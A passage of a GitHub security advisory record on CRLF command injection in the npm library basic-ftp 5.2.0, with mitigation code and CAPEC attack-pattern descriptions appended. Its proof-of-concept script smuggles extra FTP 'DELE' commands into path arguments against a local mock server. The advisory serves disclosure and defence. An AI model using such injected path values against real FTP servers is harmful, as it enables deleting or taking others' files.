"CWE-93"
],
"github_reviewed": true,
"github_reviewed_at": "2026-04-08T20:02:25Z",
"nvd_published_at": "2026-04-09T18:17:02Z",
"severity": "HIGH"
},
"details": "## Summary\n\n`basic-ftp` version `5.2.0` allows FTP command injection via CRLF sequences (`\\r\\n`) in file path parameters passed to high-level path APIs such as `cd()`, `remove()`, `rename()`, `uploadFrom()`, `downloadTo()`, `list()`, and `removeDir()`. The library\u0027s `protectWhitespace()` helper only handles leading spaces and returns other paths unchanged, while `FtpContext.send()` writes the resulting command string directly to the control socket with `\\r\\n` appended. This lets attacker-controlled path strings split one intended FTP command into multiple commands.\n\n## Affected product\n\n| Product | Affected versions | Fixed version |\n| --- | --- | --- |\n| basic-ftp (npm) | 5.2.0 (confirmed) | no fix available as of 2026-04-04 |\n\n## Vulnerability details\n\n- CWE: `CWE-93` - Improper Neutralization of CRLF Sequences (\u0027CRLF Injection\u0027)\n- CVSS 3.1: `8.6` (`High`)\n- Vector: `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:L`\n- Affected component: `dist/Client.js`, all path-handling methods via `protectWhitespace()` and `send()`\n\nThe vulnerability exists because of two interacting code patterns:\n\n**1. Inadequate path sanitization in `protectWhitespace()` (line 677):**\n\n```javascript\nasync protectWhitespace(path) {\n if (!path.startsWith(\" \")) {\n return path; // No sanitization of \\r\\n characters\n }\n const pwd = await this.pwd();\n const absolutePathPrefix = pwd.endsWith(\"/\") ? pwd : pwd + \"/\";\n return absolutePathPrefix + path;\n}\n```\n\nThis function only handles leading whitespace. It does not strip or reject `\\r` (0x0D) or `\\n` (0x0A) characters anywhere in the path string.\n\n**2. Direct socket write in `send()` (FtpContext.js line 177):**\n\n```javascript\nsend(command) {\n this._socket.write(command + \"\\r\\n\", this.encoding);\n}\n```\n\nThe `send()` method appends `\\r\\n` to the command and writes directly to the TCP socket. If the command string already contains `\\r\\n` sequences (from unsanitized path input), the FTP server interprets them as command delimiters, causing the single intended command to be split into multiple commands.\n\n**Affected methods** (all call `protectWhitespace()` \u2192 `send()`):\n- `cd(path)` \u2192 `CWD ${path}`\n- `remove(path)` \u2192 `DELE ${path}`\n- `list(path)` \u2192 `LIST ${path}`\n- `downloadTo(localPath, remotePath)` \u2192 `RETR ${remotePath}`\n- `uploadFrom(localPath, remotePath)` \u2192 `STOR ${remotePath}`\n- `rename(srcPath, destPath)` \u2192 `RNFR ${srcPath}` / `RNTO ${destPath}`\n- `removeDir(path)` \u2192 `RMD ${path}`\n\n## Technical impact\n\nAn attacker who controls file path parameters can inject arbitrary FTP protocol commands, enabling:\n\n1. **Arbitrary file deletion**: Inject `DELE /critical-file` to delete files on the FTP server\n2. **Directory manipulation**: Inject `MKD` or `RMD` commands to create/remove directories\n3. **File exfiltration**: Inject `RETR` commands to trigger downloads of unintended files\n4. **Server command execution**: On FTP servers supporting `SITE EXEC`, inject system commands\n5. **Session hijacking**: Inject `USER`/`PASS` commands to re-authenticate as a different user\n6. **Service disruption**: Inject `QUIT` to terminate the FTP session unexpectedly\n\nThe attack is realistic in applications that accept user input for FTP file paths \u2014 for example, web applications that allow users to specify files to download from or upload to an FTP server.\n\n## Proof of concept\n\n**Prerequisites:**\n\n```bash\nmkdir basic-ftp-poc \u0026\u0026 cd basic-ftp-poc\nnpm init -y\nnpm install basic-ftp@5.2.0\n```\n\n**Mock FTP server (ftp-server-mock.js):**\n\n```javascript\nconst net = require(\u0027net\u0027);\nconst server = net.createServer(conn =\u003e {\n console.log(\u0027[+] Client connected\u0027);\n conn.write(\u0027220 Mock FTP\\r\\n\u0027);\n let buffer = \u0027\u0027;\n conn.on(\u0027data\u0027, data =\u003e {\n buffer += data.toString();\n const lines = buffer.split(\u0027\\r\\n\u0027);\n buffer = lines.pop();\n for (const line of lines) {\n if (!line) continue;\n console.log(\u0027[CMD] \u0027 + JSON.stringify(line));\n if (line.startsWith(\u0027USER\u0027)) conn.write(\u0027331 OK\\r\\n\u0027);\n else if (line.startsWith(\u0027PASS\u0027)) conn.write(\u0027230 Logged in\\r\\n\u0027);\n else if (line.startsWith(\u0027FEAT\u0027)) conn.write(\u0027211 End\\r\\n\u0027);\n else if (line.startsWith(\u0027TYPE\u0027)) conn.write(\u0027200 OK\\r\\n\u0027);\n else if (line.startsWith(\u0027PWD\u0027)) conn.write(\u0027257 \"/\"\\r\\n\u0027);\n else if (line.startsWith(\u0027OPTS\u0027)) conn.write(\u0027200 OK\\r\\n\u0027);\n else if (line.startsWith(\u0027STRU\u0027)) conn.write(\u0027200 OK\\r\\n\u0027);\n else if (line.startsWith(\u0027CWD\u0027)) conn.write(\u0027250 OK\\r\\n\u0027);\n else if (line.startsWith(\u0027DELE\u0027)) conn.write(\u0027250 Deleted\\r\\n\u0027);\n else if (line.startsWith(\u0027QUIT\u0027)) { conn.write(\u0027221 Bye\\r\\n\u0027); conn.end(); }\n else conn.write(\u0027200 OK\\r\\n\u0027);\n }\n });\n});\nserver.listen(2121, () =\u003e console.log(\u0027[*] Mock FTP on port 2121\u0027));\n```\n\n**Exploit (poc.js):**\n\n```javascript\nconst ftp = require(\u0027basic-ftp\u0027);\n\nasync function exploit() {\n const client = new ftp.Client();\n client.ftp.verbose = true;\n try {\n await client.access({\n host: \u0027127.0.0.1\u0027,\n port: 2121,\n user: \u0027anonymous\u0027,\n password: \u0027anonymous\u0027\n });\n\n // Attack 1: Inject DELE command via cd()\n // Intended: CWD harmless.txt\n // Actual: CWD harmless.txt\\r\\nDELE /important-file.txt\n const maliciousPath = \"harmless.txt\\r\\nDELE /important-file.txt\";\n console.log(\u0027\\n=== Attack 1: DELE injection via cd() ===\u0027);\n try { await client.cd(maliciousPath); } catch(e) {}\n\n // Attack 2: Double DELE via remove()\n const maliciousPath2 = \"decoy.txt\\r\\nDELE /secret-data.txt\";\n console.log(\u0027\\n=== Attack 2: DELE injection via remove() ===\u0027);\n try { await client.remove(maliciousPath2); } catch(e) {}\n\n } finally {\n client.close();\n }\n}\nexploit();\n```\n\n**Running the PoC:**\n\n```bash\n# Terminal 1: Start mock FTP server\nnode ftp-server-mock.js\n\n# Terminal 2: Run exploit\nnode poc.js\n```\n\n**Expected output on mock server:**\n\n```\n\"OPTS UTF8 ON\"\n\"USER anonymous\"\n\"PASS anonymous\"\n\"FEAT\"\n\"TYPE I\"\n\"STRU F\"\n\"OPTS UTF8 ON\"\n\"CWD harmless.txt\"\n\"DELE /important-file.txt\" \u003c-- injected from cd()\n\"DELE decoy.txt\"\n\"DELE /secret-data.txt\" \u003c-- injected from remove()\n\"QUIT\"\n```\n\nThis command trace was reproduced against the published `basic-ftp@5.2.0`\npackage on Linux with a local mock FTP server. The injected `DELE` commands are\nreceived as distinct FTP commands, confirming that CRLF inside path parameters\nis not neutralized before socket write.\n\n## Mitigation\n\n**Immediate workaround**: Sanitize all path inputs before passing them to basic-ftp:\n\n```javascript\nfunction sanitizeFtpPath(path) {\n if (/[\\r\\n]/.test(path)) {\n throw new Error(\u0027Invalid FTP path: contains control characters\u0027);\n }\n return path;\n}\n\n// Usage\nawait client.cd(sanitizeFtpPath(userInput));\n```\n\n**Recommended fix for basic-ftp**: The `protectWhitespace()` function (or a new validation layer) should reject or strip `\\r` and `\\n` characters from all path inputs:\n\n```javascript\nasync protectWhitespace(path) {\n // Reject CRLF injection attempts\n if (/[\\r\\n\\0]/.test(path)) {\n throw new Error(\u0027Invalid path: contains control characters\u0027);\n }\n if (!path.startsWith(\" \")) {\n return path;\n }\n const pwd = await this.pwd();\n const absolutePathPrefix = pwd.endsWith(\"/\") ? pwd : pwd + \"/\";\n return absolutePathPrefix + path;\n}\n```\n\n## References\n\n- [npm package: basic-ftp](https://www.npmjs.com/package/basic-ftp)\n- [GitHub repository](https://github.com/patrickjuchli/basic-ftp)\n- [Vulnerable source: Client.js protectWhitespace()](https://github.com/patrickjuchli/basic-ftp/blob/master/src/Client.ts)\n- [Vulnerable source: FtpContext.js send()](https://github.com/patrickjuchli/basic-ftp/blob/master/src/FtpContext.ts)\n- [CWE-93: Improper Neutralization of CRLF Sequences](https://cwe.mitre.org/data/definitions/93.html)\n- [OWASP: CRLF Injection](https://owasp.org/www-community/vulnerabilities/CRLF_Injection)",
"id": "GHSA-chqc-8p9q-pq6q",
"modified": "2026-04-09T19:06:10Z",
"published": "2026-04-08T20:02:25Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/patrickjuchli/basic-ftp/security/advisories/GHSA-chqc-8p9q-pq6q"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39983"
},
{
"type": "WEB",
"url": "https://github.com/patrickjuchli/basic-ftp/commit/2ecc8e2c500c5234115f06fd1dbde1aa03d70f4b"
},
{
"type": "PACKAGE",
"url": "https://github.com/patrickjuchli/basic-ftp"
},
{
"type": "WEB",
"url": "https://github.com/patrickjuchli/basic-ftp/releases/tag/v5.2.1"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:L",
"type": "CVSS_V3"
}
],
"summary": "basic-ftp has FTP Command Injection via CRLF"
}
Mitigation
Avoid using CRLF as a special sequence.
Mitigation
Appropriately filter or quote CRLF sequences in user-controlled input.
CAPEC-15: Command Delimiters
An attack of this type exploits a programs' vulnerabilities that allows an attacker's commands to be concatenated onto a legitimate command with the intent of targeting other resources such as the file system or database. The system that uses a filter or denylist input validation, as opposed to allowlist validation is vulnerable to an attacker who predicts delimiters (or combinations of delimiters) not present in the filter or denylist. As with other injection attacks, the attacker uses the command delimiter payload as an entry point to tunnel through the application and activate additional attacks through SQL queries, shell commands, network scanning, and so on.
CAPEC-81: Web Server Logs Tampering
Web Logs Tampering attacks involve an attacker injecting, deleting or otherwise tampering with the contents of web logs typically for the purposes of masking other malicious behavior. Additionally, writing malicious data to log files may target jobs, filters, reports, and other agents that process the logs in an asynchronous attack pattern. This pattern of attack is similar to "Log Injection-Tampering-Forging" except that in this case, the attack is targeting the logs of the web server and not the application.